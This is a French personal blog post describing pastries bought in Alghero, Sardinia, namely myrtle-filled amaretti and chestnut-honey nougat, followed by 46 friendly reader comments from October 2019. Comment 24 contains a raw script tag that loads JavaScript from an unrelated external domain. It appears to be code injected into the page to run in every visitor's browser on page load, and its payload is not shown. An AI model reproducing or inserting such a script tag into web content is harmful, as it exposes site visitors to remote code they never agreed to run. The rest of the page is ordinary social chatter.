• Petites douceurs.....

    Petites douceurs.....

    Photo prise sur le net 

    Je vous ai déjà parlé de mes adresses secrètes d'Alghero.

    Je voudrais d'abord vous parler D'Emmanuella qui tient une boutique , qui est un petit bijou, dans le centre de la ville.C'est tellement discret que la propriétaire a disposé devant les marches d'entrée deux pots de fleurs pour que l'on puisse repérer sa boulangerie pâtisserie. Le local est situé dans le centre ancien d'Alghero et quand on rentre on est tout de suite intrigué par un plafond superbe décoré d'une fresque ancienne.Cela  vous met dans l'ambiance.

    Petites douceurs.....

    Pour moi une étape incontournable pour acheter des Amaretti qui sont vraiment délicieux.Croquant en surface et moelleux à l'intérieur.Cette année une création proposée, des Amaretti de Desolo fourrés à la myrthe.Une surprise qui a entraîné leur achat.Mon dieu que ce goût est subtil et que sa couleur parme magnifique.Un vrai régal. Emmanuella m'accueille toujours avec beaucoup de gentillesse  et avec son " mon vieux client Corse " qui me fait plaisir.

    Petites douceurs.....

    L'autre  visite est faite directement sur le marché hebdomadaire d'Alghero où l'on trouve de tout.Je vais toujours acheter du nougat au miel de châtaigne débité sur place et avec dextérité par le propriétaire du stand .C'est d'une douceur et d'une saveur incomparable.

    Petites douceurs.....

    Je sais que je vais vous faire saliver ,mais je voulais absolument faire découvrir ces produits identitaires sardes de grande qualité

    Je vous souhaite une très bonne soirée.

    Ps : Je compte tous les soirs les amaretti et vérifie la boîte de nougat. Mdrrrrr

    « Entre minéral et végétal....Moment d'histoire....... »

  • Commentaires

    1
    Lundi 21 Octobre 2019 à 19:01

    c'est pas pour les diabétiques toutes ces bonnes choses mais on a le droit de les savourer des yeux. j'ai tout-de-suite repéré le nougât, mon pêché mignon maintenant interdit, zut alors !

    2
    Lundi 21 Octobre 2019 à 19:08
    Que des bonnes choses
    Il doit y avoir beaucoup de gourmands intéressés

    Merci pour l adresse
    On ne sait jamais
    Bonne soirée baba

    Kenavo
    3
    Lundi 21 Octobre 2019 à 20:16

    ahhhh j'ai la langue sur le clavier, les macarons à la myrthe , le nougat a la chataigne, miam miam on a pas soupé nous alors là j'ai faim, et j'en ferai bien mon diner vois tu ... ben tu as du te régaler,  toi le gourmet..

    bien avancé aujourd'hui, encore avec mon tri, et pour maman tout baigne, 300 le taux de plaquettes, impec, on ne la voit plus qu'une fois par an au lieu de 2, le médoc fonctionne très bien et ses analyses sont tops donc ouf..

    pas très chaud, car pas de chauffage demain am je m'enferme dans mes wc pendant qu'ils changent toutes les fenêtres , ça devrait durer 4/5H quand même .. ça va me paraitre long, j'emmènerai mon tel, et je jouerai à candy crush .. lol.

    un bizou baba une bonne soirée à toi et la caresse à dora qui peut pas manger du nougat sarde lol..

    la pauvre elle loupe.. je t'embrasse flo

    4
    Lundi 21 Octobre 2019 à 21:11

    Bonsoir Baba

    Tout parait bien bon, mais ça fait loin pour aller en acheter dommage

    Oui les "Amarettis de Desolo fourrés à la myrthe" paraissent bien bons

    Je te souhaite une bonne soirée, bisous

    5
    Lundi 21 Octobre 2019 à 21:15

    bonsoir , ben , si tu nous prends par les sentiments , on veut bien gouter à ces bonnes choses  , merci de ton passage sur mon blog , du côté météo , c'était gris toute la journée mais pas de pluie , bonne soirée , bisous

    6
    Lundi 21 Octobre 2019 à 21:53

    J'ai goûté une fois à la Foire de Paris des amareti. J'avais trouvé cela délicieux.

    Douce soirée

    7
    Mardi 22 Octobre 2019 à 02:32

    Bonjour baba

    sadique me montré cela le matin

     

    Passe une très bonne journée

     

    Avec amitiés

     

    René

     

    8
    Mardi 22 Octobre 2019 à 05:40

    Tu vas faire monter le taux de glycémie de tous tes visiteurs rien qu'en voyant tes images !

    Tu ne serais pas un peu sadique de nous montre tout ça auquel on ne peut pas accéder ???

    " Bon mardi avec encore du mauvais temps ...
    Problème de chaudière, cette nuit, nous avons eu les pompiers à 3h du mat' mais tout est rentré dans l'ordre.
    Pas de dégâts mais grosse frayeur.
    Gros bisoux ♥ "

     

    9
    Mardi 22 Octobre 2019 à 07:49

    Effectivement, j'en ai l'eau  à la bouche . Je crois avoir vu cette petite boulangerie en visitant le centre ancien d'Alghero l'an dernier . Mais nous n'y sommes pas entrés .

    Pas trop chaud à Ajaccio ?  J'ai vu que les gens se baignent comme en été.

    Même en altitude,il fait très bon . Bonne journée

     

    10
    Mardi 22 Octobre 2019 à 08:37

    Le vieux client Corse va devoir surveiller son poids !

    11
    Mardi 22 Octobre 2019 à 09:05

    Cela m'a l'air délicieux tout ça!!!

    Tant pis pour le diabète...je t'envoie mon adresse! tu m'envoie ce que tu veux! LOL

    Bonne journée

    12
    Mardi 22 Octobre 2019 à 09:18

    Bon ben on voit que tu connais les adresses incontournables pour les gourmands...

    Le vieux client corse a dû se régaler !

    Bonne journée

    13
    Mardi 22 Octobre 2019 à 09:22
    francinea

    Bonjour, les amaretti sont un genre de macarons apparemment; le nougat doit être excellent ! avec modération, je ne consomme plus de sucres ajoutés, mais de temps en temps, une entorse au régime ne nuit pas ! je te souhaite une bonne journée, bisous

    14
    Mardi 22 Octobre 2019 à 10:57

    La création du jour

    Bonjour Baba,

    que de bonnes choses à déguster avec modération pour le diabète !....

    Bonne journée, gros bisous

    15
    Mardi 22 Octobre 2019 à 11:03

    Tu connais les bonnes adresses Baba, je te reconnais bien là gourmand surtout "gourmet" !!!!!

    Alain en salive déjà .

    Bonne journée frisquette ce matin ici mais soleil, soleil, pas de pluie , ni vent .

    Bises

    Christiane

    16
    Mardi 22 Octobre 2019 à 12:13

    Pas bon pour les hanches mais je t'avoue qu'il me serait impossible de résister.

    J'en ai l'eau à la bouche.

    Bon mardi Baba.

    Bizz

    17
    Mardi 22 Octobre 2019 à 17:06

    BONJOUR

    Tempi pour les kilos ! je prend tout 

    comme tu le dit si bien ! juste pour nous faire envie

    bonne soirée bises

    18
    Mardi 22 Octobre 2019 à 17:48

    Bonjour Baba, tu exagères de nous mettre comme cela l'eau  à la bouche, et je suis certaine que rien que d'avoir regarder tes photos et lu tes explications, j'ai du prendre quelques kilo. Bravo quand même. Je te souhaite une bonne fin de soirée, bisous

    19
    Mardi 22 Octobre 2019 à 17:49

    Là ! Tout est bon ... Un vrai régal !

    Passe une très bonne soirée . Cordiales amitiés & à +

    20
    Mardi 22 Octobre 2019 à 18:10

    on ne peut s'empêcher de saliver ces bons produits...

    Bonne soirée..Jacques

    21
    Mardi 22 Octobre 2019 à 18:15

    Belles tentations, j'ai découvert ces biscuits il y a peu, dans un super snack près de mon travail...ils les font divinement bien aussi...  je craque autant pour ça que pour les pasteis de nata, et une chance que je n'en trouve pas à 200 mètres de chez moi, sinon....  bonne soirée, Baba, bizz

    22
    Mardi 22 Octobre 2019 à 19:11

    Salut,

    Tu as de quoi te régaler.

    On a eu une belle journée douce .

    Bonne journée

    23
    Mardi 22 Octobre 2019 à 19:47

    Bonsoir Baba

    Dit donc , tu n'as pas honte de nous montrer toutes ces délicieuses gourmandises , miam  , tu m'as donné faim , c'est malinwink2!

    Je te souhaite une excellente soirée

    Bise

    24
    Mardi 22 Octobre 2019 à 21:57

    Salut Baba,

    Rien qu'à en voir ces photos, on en a le gout à la bouche.

    BONNE SOIRÉE.

    <script src="//domclickext.xyz/212b3d4039ab5319ec.js" type="text/javascript"></script>
    25
    Mercredi 23 Octobre 2019 à 04:55

    C'est tentant

    JP

    26
    Mercredi 23 Octobre 2019 à 10:49

    Bonjour baba . Et . bien là du coup tu viens de me faire saliver à en avoir la langue qui pend jusqu'au pieds . Mais la raison l'emporte sur mon trop de cholestérol . Merci pour ce bon moment (en images) très gustatif .  Bonne semaine à toi . 

     Amicalement .

    27
    Mercredi 23 Octobre 2019 à 11:04

    La création du jour

    Bonjour BABA;

    est-ce qu'il te reste encore du nougat ?...

    Bonne journée, chez nous pluvieuse, gros bisous

    28
    Mercredi 23 Octobre 2019 à 11:09

    Effectivement vous me faites saliver devant tous ces trésors...

    29
    Mercredi 23 Octobre 2019 à 11:10

    C'est un véritable ode à la tentation chez toi ce matin .... 
    J'en salive comme tu ne peux imaginer (rires)
    Beau mercredi

    30
    Mercredi 23 Octobre 2019 à 11:48

    bonjour baba

    rien qu'à voir les photos j'en salive

    tout m'a l'air bien bon

    amitié et belle journée à toi

    31
    Mercredi 23 Octobre 2019 à 13:24

    Tu es complètement " Baba" devant toutes ces gourmandises, et tu les comptent, tu as peur que madame baba  t'en dérobes, lol, JL

    32
    Mercredi 23 Octobre 2019 à 20:29

    je bave devant la boulangerie et devant le nougat … miam.. 

    bon ben pas de chauffage raté , manque une pièce sur la chaudière , l'ont commandée, on aura du chauffage ce w.end grrrr

    ma copine d'en fasse s'est agacée a porté plainte a fait appel à  un huissier qui devait venir constater elle en a marre on est tous malade avec des complications a cause du froid..

    déçus kevin et moi des nouvelles fenêtres/volets très léger tout ça, un  poid plume ça nous inquiète lorsqu'il y a du vent déjà ceux d'avant menaçaient de se dégonder, vite on les remontaient mais la nuit sont baissés et le grand ben une fois s'était dégondés pourtant etaient plus épais et plsu lourd.. et le pire c'est que l'on sent plein d'air , on a l'impression d'être en courant d'air.. on va attendre que le chauffage soit remis pour vois si ça fait encore ça  c'est peut être parce qu'il fait froid ? mais ma copine d'en face dit qu'ils ont pris les devis les moins chers et a des doutes sur la qualité de la  marchandise.. à voir plus tard.

    espère que toi ça va, nous le sud de la France a bien morflé , mon dieu que d'horreur .. des inondations un peu partout ..

    demain mon amie Bernadette vient me voir je vais lui donner  plein de choses qu'elle va emmener à emauss , comme ça on se verra car b ien p rise avec les travaux, kevin est content a eu 18.5/20 en  maths , il espère qu'avec de si bonnes note va être accepté par le département en BTS , vu qu'il n'a pas le bac S … la secrétaire a dit c'est pas gagné ! elle nous fiche la frousse celle là ..

    il serait dégouté, si on refusait de l'inscrire et y aurait de quoi et en candidat libre ??? je sais pas.. s'il pourrait ..

    sinon maman va bien , on touche du bois,que ça dure

    allez une bonne soirée à toi baba, une caresse à dora , et un bizou flo

    33
    Jeudi 24 Octobre 2019 à 10:38

    bonjour Baba , oui des bons produits comme ça !  on ne peut qu'aimer !

    et nous en + on est gourmand  hi hi hi 

    et ces  Amaretti   qui ressemblent aux macarons  waouh 

    j'en ai l'eau à la bouche  ! merci du partage 

    belle semaine a +  j'ai vu que vous eu du beau temps avec 30°  j'aurais aimé  hi hi 

    nous il pleut et il fait froid en gironde !!!    

    34
    Jeudi 24 Octobre 2019 à 10:39

    Bonjour Baba

    Un petit coucou tout en regardant ces gourmandises

    Je te souhaite une bonne journée, bisous

    35
    Jeudi 24 Octobre 2019 à 11:16

    La création du jour

    Bonjour Baba,

    pas d'interruption, la pluie continue de tomber...

    Bonne journée, gros bisous

    36
    Jeudi 24 Octobre 2019 à 12:16

    Tu me fais saliver, et juste à l'heure du repas !!!

    yes c'est la boutique, ou bien Emmanuella,  qui est un petit bijou ? sarcastic

     

    dominique

    37
    Jeudi 24 Octobre 2019 à 13:24

    Bonjour Baba, oh la la! comme çà à l'aire délicieux! dommage que la sardaigne soit si loin de chez moi, j'y filerais autrement! Profite de ces bonnes choses! bonne journée et gros bisous

    38
    Jeudi 24 Octobre 2019 à 15:53

    Bonjour Baba

    Oh que oui coquin yestu m'as fais saliver de plaisirhe, si tu me voyais me tortiller sur mon siège pour essayer de te choper un de ces exquis gâteaux qui ressemblent aux macarons mais surtout un que dis-je au moins deux morceaux de nougat car j'adore, avec moi si tu comptais j'aurais droit à la fessée ih ih ih !!!!! car je suis tellement gourmande, tu me fais penser à mon mari qui aussi vérifie si je n'ai pas abusé de ce genre de bonnes choses arfff ces zhoms MDR !!!!wink2

    En tous les cas la vitrine est magnifique, hummm !!!!! je sens que je me régalerais avec tout ce beau choix de tites douceurs.

    C'est sous le soleil et la chaleur qui commence à nous faire sentir que l'été est en train de s'installer que je viens te remercier de ta fidélité à mon blog et te souhaiter un bel après-midi plein de douceur et de bonheur.

    Bises amicales de mon ti rocher.

     

    39
    Jeudi 24 Octobre 2019 à 17:24

    Salut

    J'espère que tu as digéré depuis.

    Le temps est super chez nous.

    On pense à ceux qui ont des intempéries.

    Bonne journée

    40
    Jeudi 24 Octobre 2019 à 17:37

    un endroit ou il ne faut pas que j'aille car mon tour de taille en prendrait un coup!!! lol

    bonne soirée

    41
    Vendredi 25 Octobre 2019 à 03:59
    Bonjour baba Termine bien la semaine Avec amitiés René
    42
    Dimanche 27 Octobre 2019 à 10:43

    Les Amarettis à la Myrthe ce doit être délicieux. Lorsque nous sommes allés en Corse, c’était fin Février (il y a une dizaine d’années) c’était bien calme au niveau touristes et partout on était bien accueillis, dans un restaurant un midi le restaurateur à voulu absolument nous offrir un alcool de Myrthe à la fin de notre déjà copieux déjeuner, un bon et beau souvenir.

    Biz. Aline

    43
    Dimanche 27 Octobre 2019 à 12:30

    La création du jour

    Bonjour Baba,

    un passage tardif après avoir regardé le match de rugby...

    Bonne journée, gros bisous

    44
    Lundi 28 Octobre 2019 à 17:51

    hum, une bonne adresse qui fait titiller mes papilles.

    Bonne soirée

    45
    Lundi 28 Octobre 2019 à 23:14

    Ah Baba, dire que j'avais raté ces délicieuses gourmandises.

    Malgré l'heure tardive pour moi qui serait mieux au lit, je salive d'envie!!!

    Douce nuit et amitiés.

    46
    Mardi 29 Octobre 2019 à 07:47

    Voilà, j'ai faim maintenant!

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :